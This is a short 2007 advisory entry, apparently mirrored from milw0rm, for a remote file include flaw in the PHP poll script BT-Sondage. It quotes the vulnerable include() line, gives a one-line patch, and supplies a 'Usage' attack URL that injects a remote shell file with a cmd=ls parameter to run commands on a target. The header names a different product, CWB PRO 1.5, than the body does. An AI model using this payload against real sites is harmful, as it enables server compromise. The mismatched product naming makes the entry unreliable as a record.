CWB PRO Version 1.5(INCLUDE_PATH)Remote File Include Vulnerabilites

2007-04-05T00:00:00
ID SECURITYVULNS:DOC:16594
Type securityvulns
Reporter Securityvulns
Modified 2007-04-05T00:00:00

Description


Title : BT-Sondage-v112 Remote File Include Vulnerability


Author: Crackers_Child

cont@ct: localexploit@hotmail.com


Affected software description :

Application : BT-Sondage URL : http://www.phpscripts-fr.net/scripts/download.php?id=1575


dork : Download Script :) Exploit :


Vulnerable Codes .n gestion_sondage.php

include($repertoire_visiteur.'utilitaires/affichage_formulaire.php');

For Patch .t add

if ( !defined( "_GESTION_SONDAGE_PHP" ) ) {


Usage:

http://[target]/[sondage_path]/utilitaires/gestion_sondage.php?repertoire_visiteur=Shell.txt?&cmd=ls


greets: EveryBody :=)


Note : Melek Bir Yandan .eytan Bir Yandan Bas.m Zindan Yardim Et Allah'.m Yardim :(


milw0rm.com [2007-04-01]